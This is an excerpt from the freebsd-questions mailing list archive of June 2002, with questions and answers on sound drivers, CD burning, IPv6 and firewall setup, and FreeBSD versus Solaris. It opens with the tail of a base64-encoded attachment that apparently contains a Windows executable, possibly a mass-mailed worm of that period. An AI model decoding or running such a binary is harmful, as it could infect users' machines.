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 --sdlncqm-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 10: 5:39 2002 Delivered-To: freebsd-questions@freebsd.org Received: from free.bsd.net (free.bsd.net [213.221.117.2]) by hub.freebsd.org (Postfix) with SMTP id C8A6B37B400 for ; Sun, 23 Jun 2002 10:05:32 -0700 (PDT) Received: (qmail 92887 invoked by uid 100); 23 Jun 2002 17:05:28 -0000 X-BSD-Qmail-VirusScan: scanned by Sophos Anti-Virus v3.58 FILE NOT INFECTED: [1024851928.92881-0.free.bsd.net] FILE NOT INFECTED: [1024851928.92881-1.free.bsd.net] Mail-Followup-To: freebsd-questions@freebsd.org, yunseukcha@hanabank.com Date: Sun, 23 Jun 2002 19:05:28 +0200 From: Martin Hasenbein To: yunseukcha@hanabank.com Cc: freebsd-questions@freebsd.org Subject: Re: question about BSD Daemon image Message-ID: <20020623190528.A86407@free.bsd.net> Reply-To: Martin Hasenbein References: <001f01c21ad7$17ae87c0$81050a6f@intra.hanabank.co.kr> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="jRHKVT23PllUwdXP" Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: <001f01c21ad7$17ae87c0$81050a6f@intra.hanabank.co.kr>; from yunseukcha@hanabank.com on Mo , Jun 24, 2002 at 01:57:43am +0900 X-Operating-System: FreeBSD free.bsd.net 4.5-RELEASE-p4 i386 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --jRHKVT23PllUwdXP Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable On Mo 24 Jun (01:57:43) yunseukcha@hanabank.com (yunseukcha@hanabank.com) w= rote: Hoi, > Can I use the BSD Daemon on T-shirts for sale ? >=20 You better ask Mr. McKusck about that. He is the copyright holder of the BSD Daemon: http://www.mckusick.com/beastie/mainpage/copyright.html /mh --=20 Martin Hasenbein -- mh@bsd.net -- http://bsd.net UNIX, a way of life. FreeBSD, my choice of living. --jRHKVT23PllUwdXP Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: Weitere Infos: siehe http://www.gnupg.org iD8DBQE9Ff/YqLL0BvqAa6ERAsI7AJ9fDT3R9iZqDuRiw71dWZ3/zAioYACbBjZu 1n1z/A2WoT02kt7vn0qo4Hg= =CZMt -----END PGP SIGNATURE----- --jRHKVT23PllUwdXP-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 10:13:22 2002 Delivered-To: freebsd-questions@freebsd.org Received: from pimout3-int.prodigy.net (pimout3-ext.prodigy.net [207.115.63.102]) by hub.freebsd.org (Postfix) with ESMTP id D9F6237B403 for ; Sun, 23 Jun 2002 10:13:18 -0700 (PDT) Received: from prodigy.net (ppp-63-198-86-67.dialup.nhwd02.pacbell.net [63.198.86.67]) by pimout3-int.prodigy.net (8.11.0/8.11.0) with SMTP id g5NHCWI187508 for freebsd-questions@freebsd.org; Sun, 23 Jun 2002 13:12:43 -0400 Date: Sun, 23 Jun 2002 13:12:43 -0400 From: CX157@prodigy.net Message-Id: <200206231712.g5NHCWI187508@pimout3-int.prodigy.net> Subject: Sound problems under FreeBSD 4.5 To: undisclosed-recipients:; Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG My sound card doesn't work right under FreeBSD 4.5. I've tried using the old Voxware drivers as well as the new PCM ones to no effect. Under DOS and Linux it works as a SoundBlaster. I currently have sbc0: at port 0x220-0x22f irq 5 drq 1 flags 0x15 on isa0 and pcm0: on sbc0 in my kernel... When I try to play something I get: Jun 22 09:44:06 /kernel: pcm0: record interrupt timeout, channel dead and Jun 22 09:45:25 /kernel: pcm0: play interrupt timeout, channel dead My BIOS configuration: Audio Controler Interface: 800h Sound Chip: ESS1878 I/O Base Address: 220h IRQ number: 5 1st DMA Channel: DMA0 2nd DMA Channel: DMA1 FM I/O Base Address: 388h MPU Bae Address: 330h Any help would be appreciated. Thanks. -CX157 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 10:17:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from pr93.lublin.sdi.tpnet.pl (pr93.lublin.sdi.tpnet.pl [217.97.36.93]) by hub.freebsd.org (Postfix) with SMTP id 42CE937B401 for ; Sun, 23 Jun 2002 10:17:26 -0700 (PDT) Received: (qmail 28908 invoked by uid 1001); 23 Jun 2002 17:15:06 -0000 Date: Sun, 23 Jun 2002 19:15:06 +0200 From: =?iso-8859-2?Q?Micha=B3?= Pasternak To: CX157@prodigy.net Cc: freebsd-questions@freebsd.org Subject: Re: Sound problems under FreeBSD 4.5 Message-ID: <20020623171506.GB28852@pasternak.w.lub.pl> Reply-To: Michal Pasternak References: <200206231712.g5NHCWI187508@pimout3-int.prodigy.net> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-2 Content-Disposition: inline Content-Transfer-Encoding: 8bit In-Reply-To: <200206231712.g5NHCWI187508@pimout3-int.prodigy.net> Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG CX157@prodigy.net [Sun, Jun 23, 2002 at 01:12:43PM -0400]: > My sound card doesn't work right under FreeBSD 4.5. I've tried using the old > Voxware drivers as well as the new PCM ones to no effect. Under DOS and Linux > it works as a SoundBlaster. I currently have sbc0: at port 0x220-0x22f > irq 5 drq 1 flags 0x15 on isa0 and pcm0: on sbc0 in my kernel... > When I try to play something I get: I had an ESS Audiodrive 688 card. Support for it got broken about a year ago - try downgrading your kernel sources / track cvs changes, exactly a year ago it worked ok. -- /* Micha³ Pasternak, http://pasternak.w.lub.pl, +48606570000 */ /* www.anti-dmca.org, www.debian.org/devel/debian-med */ /* On the first day God typed "M-x create-world". */ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 10:26: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from maile.telia.com (maile.telia.com [194.22.190.16]) by hub.freebsd.org (Postfix) with ESMTP id 87AAB37B400 for ; Sun, 23 Jun 2002 10:26:00 -0700 (PDT) Received: from d1o282.telia.com (d1o282.telia.com [213.66.92.241]) by maile.telia.com (8.11.6/8.11.6) with ESMTP id g5NHPxW25172 for ; Sun, 23 Jun 2002 19:25:59 +0200 (CEST) Received: from telia.com (h100n2fls31o282.telia.com [213.65.48.100]) by d1o282.telia.com (8.10.2/8.10.1) with ESMTP id g5NHPxb04823 for ; Sun, 23 Jun 2002 19:25:59 +0200 (CEST) Message-ID: <3D16043B.6DD5E713@telia.com> Date: Sun, 23 Jun 2002 19:24:11 +0200 From: Tommy X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.6-STABLE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-questions@freebsd.org Subject: cd Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Hello i got a AceR CDRW, and i can't get it to work. I use 4.6-STABLE when dmesg shows; ad0: 7665MB [15574/16/63] at ata0-master UDMA33 acd0: CD-RW <12X8X32> at ata1-master WDMA2 My error is ; burncd -f /dev/acd0c -s 4 data 4.6-RC2-install.iso fixate and it says ; burncd: ioctl(CDRIOCWRITESPEED): Input/output error Maby this cdrw is not supported? Or if anyone knows what do to i wuld be very happy. Have a nice day Tommy To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 10:45:47 2002 Delivered-To: freebsd-questions@freebsd.org Received: from thor.birkenwald.de (thor.birkenwald.de [195.143.230.218]) by hub.freebsd.org (Postfix) with ESMTP id 9A06037B410 for ; Sun, 23 Jun 2002 10:45:25 -0700 (PDT) Received: by thor.birkenwald.de (Postfix, from userid 1000) id 9829C1A9E3; Sun, 23 Jun 2002 19:45:19 +0200 (CEST) Date: Sun, 23 Jun 2002 19:45:19 +0200 From: Bernhard Schmidt To: johann@broadpark.no Cc: questions@freebsd.org Subject: Re: IPv6 on ADSL -- conflicts with onlamp.com article (IPv6, Meet FreeBSD) Message-ID: <20020623174519.GA21630@thor.birkenwald.de> References: <1024829192.3d15a70850446@mail.broadpark.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <1024829192.3d15a70850446@mail.broadpark.no> User-Agent: Mutt/1.3.99i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On Sun, Jun 23, 2002 at 12:46:32PM +0200, johann@broadpark.no wrote: Hi Johann, > firewall_enable="YES" > firewall_type="OPEN" > ipv6_firewall_enable="YES" > ipv6_firewall_type="OPEN" > > Yet, I get: > IPv6 packet filtering initialized, logging limited to 100 packets/entry > IP packet filtering initialized, divert enabled, rule-based forwarding > disabled, default to deny, logging limited to 100 packets/entry by default This note comes from the kernel booting message (you can have a look at dmesg). At this stage no root partition is mounted and therefor no rc.conf is read. It's just a note that your kernel has been configured with the firewall code enabled and the default would be deny. Then / is mounted and during startup a catch-all accept rule should be added to your firewall rules. Should be, it looks like it isn't. > Note the `default to deny' -- where does that come from. After I added all > these settings not even my NFS will work. What says "ipfw list" and "ip6fw list"? > In O'Reilly's IPv6 article > (http://www.onlamp.com/lpt/a//bsd/2002/02/22/ipv6.html) in the `Configuring > Your Gateway Machine' section it describes the rtadvd configuration. On my > g/w I have two interfaces; lnc0 (10.0.0.2, and this address *has* to be > 10.0.0.2 for it to properly connect to my Cisco ADSL modem) and ep0 > (192.168.187.2, connected to my w/s). Excactly what interfaces am I going > to add to /etc/rtadvd.conf? ep0. You should read rtadvd(8) to see what rtadvd is doing. It provides autoconfiguration to your _workstations_ (in a very wide manner like a dhcp server) and has to be attached to your internal interface. > [3] > I have registered with Freenet6, and as far as I understand, tspc connects > to it. Both ping6 and traceroute6 doesn't work, but I believe this is > because of the rtadvd. Now, *what* is my IPv6 address? Freenet6 hasn't told > me. dmesg hasn't told me. Who will? As far as I know as soon as you start tspc it should print your prefix out into the configuration file or on standard output. But I don't really know it, it has been a long while when I played with freenet6. But freenet6 is located in Canada and I think it might be better for you to look for a closer tunnel broker. I'd suggest http://www.ipng.nl for example, perhaps there is even some in Norway. > [4] > Once I find out what my address is, how will I set up my subnet so it may > work as my IPv4 one does? Will it be an internal subnet or an external > subnet? ?? Internal subnet? External subnet? Don't know what you are talking about. Normally it should be enough to assign a /64 to your interface, enable ipv6 forwarding with sysctl and startup rtadvd on this interface. On your clients you should set "net.inet6.ip6.accept_rtadv" to 1 with sysctl and reboot. If everything works, these clients should have an automagically configured address on their lan interface and a default route pointing to your router. -- bye bye Bernhard To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 11:12: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.halplant.com (ip68-100-145-31.nv.nv.cox.net [68.100.145.31]) by hub.freebsd.org (Postfix) with ESMTP id 932DE37B401 for ; Sun, 23 Jun 2002 11:11:58 -0700 (PDT) Received: by mail.halplant.com (Postfix, from userid 1001) id 923ED1A0; Sun, 23 Jun 2002 14:11:57 -0400 (EDT) Date: Sun, 23 Jun 2002 14:11:57 -0400 From: Andrew J Caines To: freebsd-questions@FreeBSD.ORG Subject: Re: [OFF] FreeBSD vs Solaris - Opinions? Message-ID: <20020623181157.GG15958@hal9000.halplant.com> Reply-To: Andrew J Caines Mail-Followup-To: freebsd-questions@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: Organization: H.A.L. Plant X-PGP-Fingerprint: C59A 2F74 1139 9432 B457 0B61 DDF2 AA61 67C3 18A1 X-Powered-by: FreeBSD 4.6-STABLE X-URL: http://halplant.com:88/ Importance: Normal User-Agent: Mutt/1.5.1i Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Steve, Since other people have pointed out that your question was meaningless and unanswerable since you didn't even hint at what you wanted to do with this system, I'll just add a couple of notes. FreeBSD is much easier to admin than Solaris for someone who is experienced in both. The same goes for most free software. The community support channels which exist for FreeBSD are substantially better than the vendor and community support in general, although there are some good Sun/Solaris community resources. If you go to a single vendor like Sun, you buy a "solution" - hardware, software, support, etc. You pay the money to get a known set of expectations. As for hardware, the two cases you gave are substantially different. > Which, in your opinion would make a better server. Sun UltrSparc 5 / 333mhz > running Solaris (I got a great deal on a couple of machines) or a generic > Athlon 1.2mhz running FreeBSD. [both machines have ATA drives & 256meg] The U5 is a low-end desktop box with a slow IDE drive. You can put half a gigabyte of RAM in and it can be useful, but it's not a real server class box and isn't a great desktop if you make the mistake of running things like CDE. My U5 with US-IIi/333MHz/512MB is roughly comparable to my PC with PII/266MHz/384MB, though I'd prefer the PC for desktop performance running the same software[1]. The Athlon is a real generation [as opposed to Intel style snake oil] ahead of the US-II. For a fair comparison from Sun, look at a new Blade with a US-III. [1] http://halplant.com:88/systems.html#Software -Andrew- -- _______________________________________________________________________ | -Andrew J. Caines- Unix Systems Engineer A.J.Caines@halplant.com | | "They that can give up essential liberty to obtain a little temporary | | safety deserve neither liberty nor safety" - Benjamin Franklin, 1759 | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 11:45: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id B378E37B405 for ; Sun, 23 Jun 2002 11:44:56 -0700 (PDT) Received: from hades.hell.gr (patr364-a19.otenet.gr [195.167.109.51]) by mailsrv.otenet.gr (8.12.3/8.12.3) with ESMTP id g5NIioFr013665 for ; Sun, 23 Jun 2002 21:44:53 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.4/8.12.4) with ESMTP id g5NIinIm033748 for ; Sun, 23 Jun 2002 21:44:49 +0300 (EEST) (envelope-from keramida@FreeBSD.org) Received: (from charon@localhost) by hades.hell.gr (8.12.4/8.12.4/Submit) id g5NGjViR027884; Sun, 23 Jun 2002 19:45:31 +0300 (EEST) (envelope-from keramida@FreeBSD.org) Date: Sun, 23 Jun 2002 19:45:30 +0300 From: Giorgos Keramidas To: Steve Warwick Cc: freebsd-questions@FreeBSD.org Subject: Re: [OFF] FreeBSD vs Solaris - Opinions? Message-ID: <20020623164529.GA26156@hades.hell.gr> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="5vNYLRcllDrimb99" Content-Disposition: inline In-Reply-To: Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG --5vNYLRcllDrimb99 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline On 2002-06-23 01:43 +0000, Steve Warwick wrote: > Sorry for the off topic post but I am interested to get some > different opinions on the "which is better FreeBSD or Solaris?" > topic. Everyone I know is pro Sun so I'm trying to get a balanced > view. > > Actually, to clarify my situation: > > Which, in your opinion would make a better server. Sun UltrSparc 5 / > 333mhz running Solaris (I got a great deal on a couple of machines) > or a generic Athlon 1.2mhz running FreeBSD. [both machines have ATA > drives & 256meg] > > Your thoughts and expert opinions welcomed, including the peripheral > topics of support, usergroups etc. Both have their good and bad points. You might want to use the old SWAT trick. Grab a page of a4 paper, and split it in four equal regions, with one vertical and one horizontal line. Start writing advantages of operating systems on the top part, Solaris on the left, FreeBSD on the right. Then disadvantages of them both, on the bottom part of the page. After a while, having asked and researched both the good and bad things that you can find, try to make a balanced decision. Some things are bound to be more important than the rest. A few of the good points of each operating system are listed on their respective homepages. Both technical and non-technical things can be found at http://www.FreeBSD.org about FreeBSD. What can be considered as an advantage, and what is definitely a disadvantage depends highly on your specific needs and requirements. Could you elaborate a bit on that part? Then, there are a lot of people on this list and resources online that wecan point you for more details... - Giorgos --5vNYLRcllDrimb99 Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.7 (FreeBSD) iD8DBQE9Ffso1g+UGjGGA7YRApfYAJwJOZP9RCzg9WfLU4I+lJLMN9UFXwCghGUh MAMDOztINf0pj1/IK+o1W44= =lb2s -----END PGP SIGNATURE----- --5vNYLRcllDrimb99-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 11:49:14 2002 Delivered-To: freebsd-questions@freebsd.org Received: from sm10.texas.rr.com (sm10.texas.rr.com [24.93.35.222]) by hub.freebsd.org (Postfix) with ESMTP id 8730437B404 for ; Sun, 23 Jun 2002 11:49:11 -0700 (PDT) Received: from adam (cs666866-250.austin.rr.com [66.68.66.250]) by sm10.texas.rr.com (8.12.0.Beta16/8.12.0.Beta16) with SMTP id g5NInAug028767 for ; Sun, 23 Jun 2002 13:49:10 -0500 Date: Sun, 23 Jun 2002 13:49:15 -0500 From: adam flott To: freebsd-questions@freebsd.org Subject: recording with via on board sound Message-Id: <20020623134915.1ed0dc11.atom@austin.rr.com> X-Mailer: Sylpheed version 0.7.7 (GTK+ 1.2.10; i386-portbld-freebsd4.6) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG $dmesg|grep pcm0: port 0xe400-0xe403,0xe000-0xe003,0xdc00-0xdcff irq 10 at device 7.5 on pci0 i have a my radio plugged into the line input on the sound card i want to be able to record it to disk. i set the recording bit with xgmixer and use lame like this lame -r - test.mp3 < /dev/dsp it worked when i used linux does the recording bit even work with freebsd and this sound card, it would be nice if i could get it to work so i dont have to buy a sb16 thanks adam To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 11:56: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mta07-svc.ntlworld.com (mta07-svc.ntlworld.com [62.253.162.47]) by hub.freebsd.org (Postfix) with ESMTP id B09D737B405 for ; Sun, 23 Jun 2002 11:55:55 -0700 (PDT) Received: from Administrator ([80.0.77.2]) by mta07-svc.ntlworld.com (InterMail vM.4.01.03.27 201-229-121-127-20010626) with SMTP id <20020623185554.JFMS19225.mta07-svc.ntlworld.com@Administrator> for ; Sun, 23 Jun 2002 19:55:54 +0100 Message-ID: <008601c21ae8$0979b060$6400a8c0@Administrator> From: "Lee" To: Subject: rc.d scripts & program output Date: Sun, 23 Jun 2002 19:59:01 +0100 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0083_01C21AF0.6B1C86A0" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0083_01C21AF0.6B1C86A0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Hi, I have (i think) now managed to get the basic system how I like it. = Cheers for all of your help. Since that is done, I have started installing some proper server apps, = the one I am doing at the moment is Postfix mail server. What I would like to ask, is there a way of suppressing program output = so that it does not show up on boot up. =20 For example, when the boot process starts up it gets to the rc.d script = for postfix and print out the following:- postfix/postfix-script: starting the postfix mail system. This is also duplicated in the logs. Is there a way that this can be = sent somewhere else, such as /dev/null. I have tried basic ways, such = as using redirection " > /dev/null" but that does not do anything. Cheers in advance for any help Lee. ------=_NextPart_000_0083_01C21AF0.6B1C86A0 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
Hi,
 
I have (i think) now managed to get the = basic=20 system how I like it.  Cheers for all of your help.
 
Since that is done, I have started = installing some=20 proper server apps, the one I am doing at the moment is Postfix mail=20 server.
 
What I would like to ask, is there a = way of=20 suppressing program output so that it does not show up on boot up.  =
 
For example, when the boot process = starts up it=20 gets to the rc.d script for postfix and print out the = following:-
 
postfix/postfix-script: starting the = postfix mail=20 system.
 
This is also duplicated in the = logs.  Is there=20 a way that this can be sent somewhere else, such as /dev/null.  I = have=20 tried basic ways, such as using redirection " > /dev/null" but that = does not=20 do anything.
 
Cheers in advance for any = help
 
Lee.
------=_NextPart_000_0083_01C21AF0.6B1C86A0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 12: 5:42 2002 Delivered-To: freebsd-questions@freebsd.org Received: from pemaquid.safeport.com (pemaquid.safeport.com [204.156.12.58]) by hub.freebsd.org (Postfix) with ESMTP id C102B37B404 for ; Sun, 23 Jun 2002 12:05:37 -0700 (PDT) Received: from localhost (doug@localhost) by pemaquid.safeport.com (8.11.6/8.11.6) with ESMTP id g5NJ5ag80711 for ; Sun, 23 Jun 2002 15:05:37 -0400 (EDT) (envelope-from doug@safeport.com) Date: Sun, 23 Jun 2002 15:05:36 -0400 (EDT) From: To: freebsd-questions@FreeBSD.ORG Subject: package for XFree86 4.2 Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I got XFree86-4.2.0_1,1.tgz from ftp.freebsd.org. The dir I used was pub/FreeBSD/ports/i386/packages/x11/ installing gets pkg_add -r XFree86-4.2.0_1,1.tgz Error: FTP Unable to get ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/Latest/XFree86-4.2.0_1,1.tgz: File unavailable (e.g., file not found, no access) pkg_add: unable to fetch `ftp://ftp.freebsd.org/pub/FreeBSD/ports/i386/packages-4-stable/Latest/XFree86-4.2.0_1,1.tgz' by URL downloading yielded a similar result. I guess my questions are: a) any benefit to using the FreeBSD package over www.xfree86.org b) if so, where does it live? _____ Douglas Denault doug@safeport.com Voice: 301-469-8766 Fax: 301-469-0601 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Sun Jun 23 12: 6:26 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mta7.pltn13.pbi.net (mta7.pltn13.pbi.net [64.164.98.8]) by hub.freebsd.org (Postfix) with ESMTP id 3D70837B411; Sun, 23 Jun 2002 12:05:51 -0700 (PDT) Received: from 3gwireless.com ([66.122.212.148]) by mta7.pltn13.pbi.net (iPlanet Messaging Server 5.1 (built May 7 2001)) with ESMTP id <0GY600061A9QOG@mta7.pltn13.pbi.net>; Sun, 23 Jun 2002 12:05:38 -0700 (PDT) Date: Sun, 23 Jun 2002 12:09:31 -0700 From: 3Gwireless'2003 Subject: Call for Submission of 2003 World Wireless Congress (3Gwireless'2003) Message-id: <3D161CEA.EB3E6CE7@3gwireless.com> MIME-version: 1.0 X-Mailer: Mozilla 4.78 [en] (Win98; U) Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7BIT X-Accept-Language: en X-Priority: 2 (High) To: undisclosed-recipients:; Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG [Sorry for multiple copies of this message. Thanks for your support in promotion of education, research, development and business of emerging wireless communications] Dear Fellow Wireless Colleagues: 2002 World Wireless Congress (WWC02) - the official framework of 3Gwireless'2002 has been extremely successful and productive. To continue this great effort and expect much more authoritative in the next year, the 2003 World Wireless Congress (WWC03) will be a very big bang in helping set the standard of performance, innovation and quality of emerging wireless communications focusing on 3G and 4G mobile technologies and business. WWC'03 will continue to be the best global platform of industry-driven, academia-enriched, development-oriented and business-targeted, and demand very high standard of technical leadership as well as professional excellence. The Call-for-Submission (including technical papers, tutorials, industry forums, panels, etc) is available now at the congress website. The submission will be very busy in the coming months, and the space is very limited. Please act ASAP to submit your leadership and innovation as per the guidelines listed in the web. The website of 2003 World Wireless Congress (3Gwireless'2003) is at: http://wirelesscongress.com or http://3gwireless.com The very successful story of 2002 World Wireless Congress (3Gwireless'2002) is at: http://delson.org/wwc02 This congress at news can be found at: http://www.wirelessweek.com/index.asp?layout=story&articleId=CA220172&stt=001 For sponsorship or exhibition opportunities, please contact janny@delson.org. For technical leadership issues, please contact the chair at: wwlu@ieee.org Thank you for your time in advance. With best wishes! Office of 2003 World Wireless Congress http://wirelesscongress.com 